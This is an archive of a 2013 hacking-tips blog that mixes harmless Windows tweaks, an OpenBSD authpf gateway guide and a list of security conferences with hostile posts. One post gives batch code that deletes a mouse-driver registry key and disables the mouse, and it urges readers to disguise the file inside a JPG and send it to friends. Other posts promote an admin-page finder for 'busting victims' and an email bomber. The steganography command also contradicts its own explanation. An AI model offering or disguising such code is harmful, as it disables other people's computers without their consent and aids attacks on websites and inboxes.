Showing posts with label Ethical H4cking. Show all posts
Showing posts with label Ethical H4cking. Show all posts

Monday 18 February 2013

Delete Recycle Bin Icon




Hi To All The Mindbenders,

Step 1.
Navigate To

start > run > gpedit.msc > user configuration > desktop > remove recycle bin from desktop > double click > change it not configured to enable > apply And Click Ok.

Step 2.
Open RUN and type  “gpupdate.exe”  without quotes and press enter. 

Step 3.
Look Over Your Desktop, Everything is fine.

===(Next is What...?)===

Sunday 17 February 2013

E-Mail Bomber By The Mindbenders

Hi To All The Mindbenders,


                                Visit Email-Bomber

Disable Mouse In Windows Using Your Own Virus




Hi To All The Mindbenders,

Make a virus that Will disable Mouse.
We Used Registry For This Act.
1. Open Notepad and copy below codes(text in red)

rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------

2. Save this file as virus.bat
Done you just created your virus, now share this with your friends and use cmd to bind this bat file behind any jpg image file as i told you in my Tutorial 

 

3. Download  Virus.bat 


Speed Up Your Adobe Acrobat Reader Opening speed


Hi To all The Mindbenders,

Adobe Acrobat reader always consumes more memory when it starts. The reason behind is, it loads all the plugins, even the plugins that you do not use. This trick is to remove all the plugins from the plugins directory to elsewhere. Hence, whenever you open Acrobat reader it directly opens the files without loading any plugins and the speed is just like Notepad.

1. Go to the installation folder of acrobat reader
(C:\program files\adobe\acrobat\reader\.. whatever)

2. Move all the files and folders from the "plugins" directory to the "Optional" directory. (I repeat.. cut and paste the files NOT copy & paste).

Also make sure that acrobat reader is not open else it will lock the files and not allow you to move the files).

Now your acrobat reader will load very fast and almost as good as notepad.

===(Next is what...?)===

Friday 15 February 2013

Notepad Adda | Trick and Tips With Notepad


Hi To All The Mindbenders,
Text to Audio
1. Open Notepad file on your Windows PC.
2. Copy and paste the below mentioned code in red text:

Dim msg, sapi

msg=InputBox("Enter your text for conversion– https://www.facebook.com/themindbenders ","DEVENDERMAHTO Text-To-Audio Converter")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak msg

3. Save this file with any name with .vbs as extension. For eg. Text-To-Audio.vbs

4. Download Text-To-Audio.vbs


Creating Logs
Here you will learn to use notepad as Digital diary or a log book to keep record of your daily work instead of using pen and paper.

1. Open Notepad and Type .LOG (in capital Letters and press enter


2. Save the program with any name and close it.


3. Open the file again. Now you can see current date and time, This will happen every time you reopen notepad.



Matrix Terminal
In this trick i will show you to make a batch file in notepad which will act as matrix effect that you might have seen in movies.Matrix effect is basically number flashes in green color.

1. Open Noteapad and copy below code into it.

@echo offcolor 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start


2. Now save this file as Matrix.bat (name can be anything but .bat is must)

3. Open your saved file and you will have matrix effect on your screen...
4. Download matrix effect.bat


Website Starter
Trick is based on batch programming so we will use a bat file to open any website of our choice.
1. Open Noteapad and copy below code into it.

start https://www.facebook.com/themindbenders

2. Now save this file as themindbenders.bat (name can be anything but .bat is must)

3. Open your saved bat file and Double Click to open it then it will open up your web-browser with website you mentioned in your bat file after start command...
4. Download Website starter.bat
===(Next Is What...?)===

Sunday 3 February 2013

Using Google Drive As A Web Hosting Service | GoogleDrive Tips


Hi Guys,
Welcome To All The Mindbenders,
Today We Are Planning to create our very first website without paying a single rupee To Web Hosting providers and thanks to google for google drive serving capabilities...

Let's Start

Step 1.
Login To Your Google Drive Account Using Your Gmail Account
https://www.drive.google.com

Step 2.
Create A new Folder in Your drive say "devendermahto" is created by me in my google drive
Note:- Click on image to in-large image



Step 3.
Select Our Created Folder which is "devendermahto"



Step 4.
Then Click on "more" and choose "share>share"



Step 5.
change permissions to public for this folder and then copy and paste the sharing link of this folder somewhere in your notepad.
check again that your link is similar to this link
https://docs.google.com/folder/d/0B3cYFzCQvhE1OHBKbl8yVnlqenM/edit?usp=sharing


Copy Link after changing permissions

Step 6.
Upload all your website files like index.html and images to this folder.


Step 7.
When all your stuffs uploaded by you then open a new tab and type following address in your address bar

https://googledrive.com/host/0B3cYFzCQvhE1OHBKbl8yVnlqenM

Step 8.
Replace 
0B3cYFzCQvhE1OHBKbl8yVnlqenM

With your own code,
 in your case text after https://docs.google.com/folder/d and before /edit?usp=sharing
is your website address{webfolder address}

check mine
https://googledrive.com/host/0B3cYFzCQvhE1OHBKbl8yVnlqenM/

Bye Guyzzzz

===(Next is What?)===


Friday 25 January 2013

Steganography using Windows Command Prompt

Hi To All The Mindbenders,
Welcome To Our New Information Segment.
Aim:- Binding a text file with a image File.

Requirements:- Windows OS and a little bit Presence of your own Mind.

Procedure:-
1. Open Command Prompt by pressing win+r key and type cmd there and hit enter.


                                                                 Note:- Inlarge Images To Get Closer.                                         


2. change directory(cd) where your image and text files present.


                                                                Note:- Inlarge Images To Get Closer.                                               



3. use below command to bind

copy /b "C:\Users\Devender Mahto\Desktop\dev.jpg" + "C:\Users\Devender Mahto\Desktop\dev.jpg" new.jpg

{where: dev.jpg is my image file, 1.txt is my text file and new.jpg is my final image file which comprises of 1.txt}

                                                                 Note:- Inlarge Images To Get Closer.                                         

4. open new.jpg with winrar to view your text file.
5. send new.jpg to your friends and loved ones for exchanging messages.
6. Like My page https://www.facebook.com/themindbenders

Precaution: Do not use this knowledge for Offensive activities otherwise we are not responsible.

Monday 14 January 2013

Online Cryptography by Encipher.it

Hi To All The Mindbenders,
In Our Daily Digital Conversations We Need to Secure our words from any third parties. That's why I'm Suggesting Encipher.it For 

encrypting email in one click

Goal:- We Want to encrypt Below line for safe messaging.
            the mindbneders is devender mahto's blog on blogger.

Steps To Follow

Step 1.
type your message.
eg:  the mindbneders is devender mahto's blog on blogger.

Step 2.
Go to
 https://encipher.it/ and follow website to boomark encipher.it

or Bookmark below link

javascript:(function(){document.body.appendChild(document.createElement('script')).src='https://encipher.it/javascripts/inject.js';})();

Step 3.
select your texts to encrypt.
eg: the mindbneders is devender mahto's blog on blogger.

Step 4.
after selecting your text click on encipher.it bookmark

Step 5.
Add Key for this message 


Step 6.
send the encrypted message and again de-crypt it by the same method.

===(Next is What?)===

Sunday 2 December 2012

Install Windows Xp From USB Drive


Hello To All The Mindbenders,
There is a windows 7 usb/dvd download tool for bootable windows 7 usb disk creator but what for windows xp ? There are several ways in which you can install windows xp from your usb flash drive or pen drive or external portable HDD. But of course, you want to know the easiest way. I have seen complex steps mentioned on other websites guiding on how to create bootable windows xp usb drive for installing windows xp from pen drive instead of cd disk but those steps are confusing and tedious for simple and new users who prefer ready made tools to get their job done. SO, I came to know about a software which creates bootable usb drive containing windows xp setup..

Requiremets :

Your windows xp cd or windows xp complete setup files.

Download WinTOflash program from here. 
Download Wintoflash now

This program is ad-supported and hence if you want to avoid irritating ads while this program creates your bootable usb, just disconnect from internet during that process.

After downloading wintoflash program, install it and then run it. It will ask for windows xp setup file location is the source box and in the target box, locate the pen drive letter path. Click on Next and go grab a cup of coffee. It will format your pendrive and then make it bootable copying all the files needed for windows xp setup. When it finishes. Just restart the computer and boot from the usb pen drive.
Note: To boot from USB drive, your bios must support usb boot. You should check that in your bios settings and the priority for usb boot should be prior to hdd boot.

If you face any problem in any step, just comment here and we’ll try to resolve your problem.


Sunday 18 November 2012

Admin Page Finder For Pro


Hi To All The Mindbenders,
We Face Many Problems When There is a need of website admin page so as usual without wasting your time i have a smart and simple idea to find admin pages of most common website type like php, HTML, Java, etc. I Am Introducing a Perl Script For Finding Admin Pages.

Follow Me...

Step 1.
Download Active Perl 

Download For Linux

Download  For Windows

Step 2.
Download Admin Page Finder  from below link (Download)

Download

Step 3.
Using admin Page Finder In Linux (suppose you placed your admin finder scripts in root folder)
 Refer To The Gif Image Below
<1>
Initialize your admin finder

root@bt:~# perl Admin_Page_Finder_By_Devender_Mahto.pl

<2>
Type name of your site
Eg:- www.google.com

<3>
choose language in which site is designed and developed for example in my case its php

to choose just type 1 for php etc.

<4>
Keep loking for something like this 
[FOUND] www.yoursite.com/something.php 



Comments For Your Doubts...
And K33p Busting Your Victim's Like Pro...
39J0Y

Thursday 15 November 2012

How to Change Windows XP Start Button



Step 1 - Modify Explorer.exe File

In order to make the changes, the file explorer.exe located at C:\Windows needs to be edited. Since explorer.exe is a binary file it requires a special editor. For purposes of this article I have used Resource Hacker. Resource HackerTM is a freeware utility to view, modify, rename, add, delete and extract resources in 32bit Windows executables and resource files (*.res). It incorporates an internal resource script compiler and decompiler and works on Microsoft Windows 95/98/ME, Windows NT, Windows 2000 and Windows XP operating systems.

get this from h**p://delphi.icm.edu.pl/ftp/tools/ResHack.zip

The first step is to make a backup copy of the file explorer.exe located at C:\Windows\explorer. Place it in a folder somewhere on your hard drive where it will be safe. Start Resource Hacker and open explorer.exe located at C:\Windows\explorer.exe.

The category we are going to be using is "String Table". Expand it by clicking the plus sign then navigate down to and expand string 37 followed by highlighting 1033. If you are using the Classic Layout rather than the XP Layout, use number 38. The right hand pane will display the stringtable. We’re going to modify item 578, currently showing the word “start” just as it displays on the current Start button.

There is no magic here. Just double click on the word “start” so that it’s highlighted, making sure the quotation marks are not part of the highlight. They need to remain in place, surrounding the new text that you’ll type. Go ahead and type your new entry. In my case I used       

                                               end

You’ll notice that after the new text string has been entered the Compile Script button that was grayed out is now active. I won’t get into what’s involved in compiling a script, but suffice it to say it’s going to make this exercise worthwhile. Click Compile Script and then save the altered file using the Save As command on the File Menu. Do not use the Save command – Make sure to use the Save As command and choose a name for the file. Save the newly named file to C:\Windows.


Step 2 – Modify the Registry

!!!make a backup of your registry before making changes!!!

Now that the modified explorer.exe has been created it’s necessary to modify the registry so the file will be recognized when the user logs on to the system. If you don’t know how to access the registry I’m not sure this article is for you, but just in case it’s a temporary memory lapse, go to Start (soon to be something else) Run and type regedit in the Open field. Navigate to:

HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows NT\ CurrentVersion\ Winlogon

In the right panel, double click the "Shell" entry to open the Edit String dialog box. In Value data: line, enter the name that was used to save the modified explorer.exe file. Click OK.

Close Registry Editor and either log off the system and log back in, or reboot the entire system if that’s your preference. If all went as planned you should see your new Start button with the revised text.


Please Reply If Helps or Reply + Repute if Really Helps

Create Your Own Authenticated Gateway And Command Your Network



Use PF to keep unauthorized users off the network.

Firewalling gateways have traditionally been used to block traffic from specific services or machines. Instead of watching IP addresses and port numbers, an authenticated gateway allows you to regulate traffic to or from machines based on a user's credentials. With an authenticated gateway, a user will have to log in and authenticate himself to the gateway in order to gain access to the protected network. This can be useful in many situations, such as restricting Internet access or restricting a wireless segment to be used only by authorized users.

With the release of OpenBSD 3.1, you can implement this functionality through the use of PF and the authpf shell. Using authpf also provides an audit trail by logging usernames, originating IP addresses, and the time that they authenticated with the gateway, as well as when they logged off the network.

To set up authentication with authpf, you'll first need to create an account on the gateway for each user. Specify /usr/sbin/authpf as the shell, and be sure to add authpf as a valid shell to /etc/shells. When a user logs in through SSH, authpf will obtain the user's name and IP address through the environment. After doing this, a template file containing NAT and filter rules is read in, and the username and IP address are applied to it. The resulting rules are then added to the running configuration. When the user logs out (i.e., types ^C), the rules that were created are unloaded from the current ruleset. For user-specific rule templates, authpf looks in /etc/authpf/users/$USER/authpf.rules. Global rule templates are stored in /etc/authpf/authpf.rules. Similarly, NAT entries are stored in authpf.nat, in either of these two directories. When a user-specific template is present for the user who has just authenticated, the template completely replaces the global rules, instead of just adding to them. When loading the templates, authpf will expand the $user_ip macro to the user's current IP address.

For example:

Code:
pass in quick on wi0 proto { tcp, udp } from $user_ip to any \

  keep state flags S/SA

This particular rule will pass in all traffic on the wireless interface from the newly authenticated user's IP address. This works particularly well with a default deny policy, where only the initial SSH connection to the gateway and DNS have been allowed from the authenticating IP address.

You could be much more restrictive and allow only HTTP-, DNS-, and email-related traffic through the gateway:

Code:
pass in quick on wi0 proto tcp from $user_ip to any \

  port { smtp, www, https, pop3, pop3s, imap, imaps } \

  keep state flags S/SA

pass in quick on wi0 proto udp from $user_ip to any port domain
After the template files have been created, you must then provide an entry point into pf.conf for the rules that authpf will create for evaluation by PF. These entry points are added to your pf.conf with the various anchor keywords:

Code:
nat-anchor authpf

rdr-anchor authpf

binat-anchor authpf

anchor authpf

Note that each anchor point needs to be added to the section it applies to—you cannot just put them all at the end or beginning of your pf.conf. Thus the nat-anchor, rdr-anchor, and binat-anchor entries must go into the address translation section of the pf.conf. Likewise, the anchor entry, which applies only to filtering rules, should be added to the filtering section.

When a user logs into the gateway, he should now be presented with a message like this:

Code:
Hello andrew, You are authenticated from host "192.168.0.61"

The user will also see the contents of /etc/authpf/authpf.message if it exists and is readable.

If you examine /var/log/daemon, you should also see log messages similar to these for when a user logs in and out:

Code:
Dec  3 22:36:31 zul authpf[15058]: allowing 192.168.0.61, \

  user andrew

Dec  3 22:47:21 zul authpf[15058]: removed  192.168.0.61, \

  user andrew- duration 650 seconds

Note that since it is present in /etc/shells, any user that has a local account is capable of changing his shell to authpf. If you want to ensure that the user cannot do this, you can create a file named after his username and put it in the /etc/authpf/banned directory. The contents of this file will be displayed when he logs into the gateway. On the other hand, you can also explicitly allow users by listing their usernames, one per line, in /etc/authpf/authpf.allow. However, any bans that have been specified in /etc/authpf/banned take precedence over entries in authpf.allow.

Since authpf relies on the SSH session to determine when the rules pertaining to a particular user are to be unloaded, care should be taken in configuring your SSH daemon to time out connections. Timeouts should happen fairly quickly, to revoke access as soon as possible once a connection has gone stale. This also helps prevent connections to systems outside the gateway from being held open by those conducting ARP spoof attacks.

You can set up OpenSSH to guard against this by adding these to lines to your sshd_config:

Code:
ClientAliveInterval 15

ClientAliveCountMax 3

This will ensure that the SSH daemon will send a request for a client response 15 seconds after it has received no data from the client. The ClientAliveCountMax option specifies that this can happen three times without a response before the client is disconnected. Thus, after a client has become unresponsive, it will be disconnected after 45 seconds. These keepalive packets are sent automatically by the SSH client software and don't require any intervention on the part of the user.

Authpf is very powerful in its flexibility and integration with PF, OpenBSD's native firewalling system. It is easy to set up and has very little performance overhead, since it relies on SSH and the operating system to do authentication and manage sessions.


And ? your done Tongue

List of All Popular Hacking and Security Conferences by Shubham Mittal (@k@ Upgoingstaar)


I was just wondering around to have a look on the most famous conferences for Hackers and when i got to know about so many people and groups running these motivating communities, I set up myself for listing nearly all HACKERS conferences happening here and there. I might have missed some conferences and if yours is not on the list, I am sorry about it. Please let me know about yours so that I can include it too.

1. DefCon

DEF CON holds the title of world's largest annual hacker convention. It was first held in Las Vegas, NV in 1993 and continues today. Attendees include a wide range of personalities interested in the hacking world, general interest groups, federal government employees, lawyers, and hackers. Its focus ranges from computer and hacking related subjects, social events, and contests such as creating the longest Wi-Fi connection to  cracking computer systems to non-related computer contests. The best known contest is Capture the Flag where teams of hackers attempt to attack and defend computers and networks.

Official Website: https://www.defcon.org/

2. Black Hat

The Black Hat Briefings is a computer security conference that brings together a variety of people interested in information security. Representatives of federal agencies and corporations attend along with hackers.

Black Hat is composed of two major sections, the Black Hat Briefings, and Black Hat Trainings. Training is offered by various Computer security vendors, in effort to keep the conference vendor-neutral. In the past, the conference has hosted the National Security Agency's Information Assurance Manager course, and various courses by Cisco SystemsOffensive Security, and others.

Official Website: http://www.blackhat.com/

3. DerbyCon

At DerbyCon security professionals from all over the world come to hang out. Next DerbyCon 2.0 will is going to held this September 27-30th, 2012. They had pulled in over as much as 1,100 people with an amazing speaker lineup and a family-like feel. Their basic goal is to keep it around the same size and maintain a close-knit conference where they can all come together to learn and share ideas.


4. NullCon
















Null is an open source community full of Security Professionals who love to share their knowledge with means of various monthly meets, seminars and conferences. In India, they are the biggest Security community with chapters in 7 major cities. Nullcon Security Conferences is an Initiative by Null - The Open Source
Community. It Is Moreover is a unique platform for security companies/evangelists to showcase their research and technology. Nullcon hosts Prototype, Exhibition, Trainings, Free Workshops, null Job Fair at the conference.

Official Website: http://nullcon.net


5. ShmooCon


ShmooCon is an American hacker convention organized by The Shmoo Group. There are typically about 35 different talks and presentations, on a variety of subjects related to computer security and cyberculture.

Official Website: http://www.shmoocon.org/







6. OWASP



OWASP also conducts its annual international information security conference, and the last one was OWASP InfoSec India Conference 2012 - "India's Cyber Security Kumbh", which was held from August 24-25, 2012 in Delhi NCR, India.
OWASP events in India have become a distinguished platform to bring industry leaders, InfoSec professionals, developers, regulators and high-profile officials from defence and security establishments together from around the world.



7. ClubHack

They started in 2007 conducting and witnessing a lot of action with their aim of making the genera people including media and professionals more aware and serious about Security.



Official Website: http://www.clubhack.com/





8. HITB




Official Website: http://conference.hitb.org/

9. HOPE

HOPE (abbreviation of Hackers on Planet Earthconference series is sponsored by the hacker magazine 2600: The Hacker Quarterly and typically held at "Hotel Pennsylvania", in Manhattan, New York City. Held biennially in the summer, there have been nine conferences to-date; the most recent occurring 13–15 July 2012.



The "Last HOPE" took place 18–20 July 2008 at the Hotel Pennsylvania.The name referred to the expectation that this would be the final H.O.P.E. conference due to the scheduled demolition of its venue, the Hotel Pennsylvania. The "Next HOPE" was scheduled for Summer 2010. At the closing ceremony it was revealed that the use of the word "last" could also refer to the previous event, or one that had ended (referring to The Last HOPE itself).


Official Website: http://www.hope.net/


10. Malcon

MALCON is an annual information security conference focusing exclusively on malware. They aims for bringing together the Malware and InfoSec researchers from the world to share key research insights into building and containment of the next generation malwares. The first MalCon conference took place in December 2010 at Mumbai and Pune, India. They have their audience in Security Professionals, Government Employees, lawyers, journaalists and hackers with interest in malwarism.

Official Website: http://www.malcon.org/

11. SummerCon

Summercon is one of the oldest hacker conventions, and the longest running such conference in America. It helped set a precedent for more modern "cons" such as H.O.P.E. and DEF CON, although it has remained smaller and more personal. Summercon has been hosted in cities such as Pittsburgh, St. Louis, Atlanta, Washington, D.C., Austin, Las Vegas, and Amsterdam. Originally run by Phrack, the underground ezine, and held annually in St. Louis, the organizational responsibilities of running Summercon were transferred to clovis in 1998 and the convention took place in Atlanta, dubbed 'Summercon X'.


Official Website: http://www.summercon.org/

12. SourceConference

SOURCE Conference is the world's premier conference and training event to focus on bringing together the business and technical communities. At SOURCE, technical experts publish advanced research and network for job opportunities, while executives keep up with the technology that shapes their important decisions. Both leave SOURCE with an understanding of each other's perspectives on the critical security problems that face the world.




13. Hacker Halted

A complete and comprehensive conference workshop that educates and equips its participants with the in-depth knowledge of understanding vulnerabilities and countermeasures to overcome the security infringements present today.This conference is a global series of Computer and Information Security conferences presented by EC-Council. The objective of the Hacker Halted conferences is to raise international awareness towards increased education and ethics in IT Security. The event is currently in its 14th year. Also present at Hacker Halted is EC-Council's H@cker Halted | Academy, trainings and workshops led by EC-Council instructors and trainers.

Official Website: http://www.hackerhalted.com/

14. PhreakNIC

PhreakNIC is an annual hacker and technology convention held in Nashville, Tennessee. It is organized by the Nashville 2600 Organization and draws upon resources from SouthEastern 2600 (se2600).



PhreakNIC continues to be a long-time favorite among hackers, security experts and technology enthusiasts. PhreakNIC currently holds claim as the oldest regional hacker con and is one of the few hacker cons run by a tax-free charity

PhreakNIC is attended by hackers and other technology enthusiasts from across the United States, although, as a regional conference, most of its attendees come from a two-state radius around Tennessee, including groups from MissouriOhioWashington, DCGeorgiaKentucky, and Alabama.

Official Site: http://phreaknic.info/

15. KiwiCon

Kiwicon provides a venue for hackers and computer security professionals as well as other interested parties to get together and share knowledge, war stories and to consume a startling amount of beer. In the spirits of H.O.P.E. and DEFCON, Kiwicon intends to bring together the best and brightest from academia, the computer security industry, the hacker underground, those who manage critical infrastructure and law enforcement.
The conference format allows for talks of various lengths on a wide range of subjects of interest, informal discussions, socialising and competitions. In the past there has been free coffee, free breakfast, and always a healthy amount of free beer.


Official Website: https://www.kiwicon.org/


16. InfiltrateCon

Infilterate is the first depp technical conference by Immunity which focuses on entirely technical issues. This conference is more focused towards those who have their excellent minds always working in offensive security issues. No policy or high-level presentations, just hard-core thought provoking technical meat. World-renowned researchers focused on the latest technical issues will do the presentations – demonstrating techniques you can’t learn about anywhere else. In order to keep Infiltrate accessible, we are limiting attendance to 100 attendees.


Official Website: http://infiltratecon.net/

17. SANS

SANS is the most trusted and by far the largest source for information security training in the world. They offer training through several delivery methods - live & virtual conferences, mentors, online, and onsite.


Official Website: http://www.sans.org/


18. HackBattle


This time the Hack Battle is fully integrated in the TNW2012 Conference ending with the grand finale of the Hack Battle presentations on stage during the Conference.
The TNW Kings of Code Hack Battle brings world leading platforms (API's and SDK's) together with an exclusive international group of coders (frontend and backend developers and designers).

19. LayerOne

LayerOne is a computer security conference located in Anaheim, California. They have been eight years old in the market and they feature speakers from all across the globe. The topics these guys covers range from lockpicking and MPLS security to covert data gathering and HIPAA compliance. This is due to fact that the spekers here come from a diverse background and include a focus not just on the nuts and bolts of technology but the social impact as well. 


Official Website: http://www.layerone.org



20. PacSec

The PacSec meeting provides an opportunity for foreign specialists to be exposed to Japanese innovation and markets and collaborate on practical solutions to computer security issues. In a relaxed setting with a mixture of material bilingually translated in both English and Japanese, the eminent technologists can socialize and attend training sessions.

The presenters are experienced security professionals at the vanguard of leading information security technology as well as experienced instructors who have prepared tutorials intended to help you stay abreast of the latest developments in this rapidly moving technological field. The best, and brightest, have assembled unique new material to help you maintain your technological leadership - which they will present at this conferences.
Official Website: http://pacsec.jp/

21. SecTor



SecTor was founded on a passion for security and it doesn’t take long to realize that security extends far beyond the bits and bytes.  They assure to ensure that they will provide quality content – current information you can’t get anywhere else.   The same rigor and dedication that their advisors apply to the selection of the technical content is also invested in selecting the management track session. Marketing fluff is not allowed or tolerated.  Their conferences includes latest research, approaches, trends, Privacy and Compliance Issues, networking stuff, purist approach and experts from around the world.


Official Website: http://www.sector.ca/

22. NotaCon
File:Notaconlogo.png

NOTACON is an annual event that focuses on people who like to build, make, break and hack stuff. For many, it is a different kind of conference experience, while maintaining some familiar aspects of other hacker conferences. Showcasing: technologies, philosophy and creativity often overlooked at other events.



Official Website: http://www.notacon.org/




23. United Security Summit

The UNITED ("Using New Ideas to Empower Defenders") Security Summit is the venue for innovation and collaboration in the security community. At UNITED, security professionals engage in straight talk, share actionable advice and debate issues. This year's theme, "Truth, Lies & Decisions: moving forward in an insecure world," continues the tradition. They target their audience in IT Security directors, managers, architects, practitioners,Analysts, etc.

Official Website: http://www.unitedsummit.org

24. HacKid
HacKid is a new kind of conference focused on providing an interactive, hands-on experience for the entire family — kids aged 5-17 & their parents — in order to raise awareness, excitement and understanding of technology, gaming, mathematics, safety, privacy, networking, security and engineering and their impact on society and culture.



25. Athcon
AthCon is an annual, European two-day conference targeting particular areas of information security. It’s aim: to bring leading information security experts together. Attacking techniques of exploitation and various forms of penetration testing have become an important component of any organisation. This conference aims to provide a venue for understanding the ever evolving changes as well as new threats.

Official Website: http://athcon.org/

So for any instance you want to attend a conference, or speak something of your own stuffz, or play the CTF, look around these conferences and keep exploiting around.